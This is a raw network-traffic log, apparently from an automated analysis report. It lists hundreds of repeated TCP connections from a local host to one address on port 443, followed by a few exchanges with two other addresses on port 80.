Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
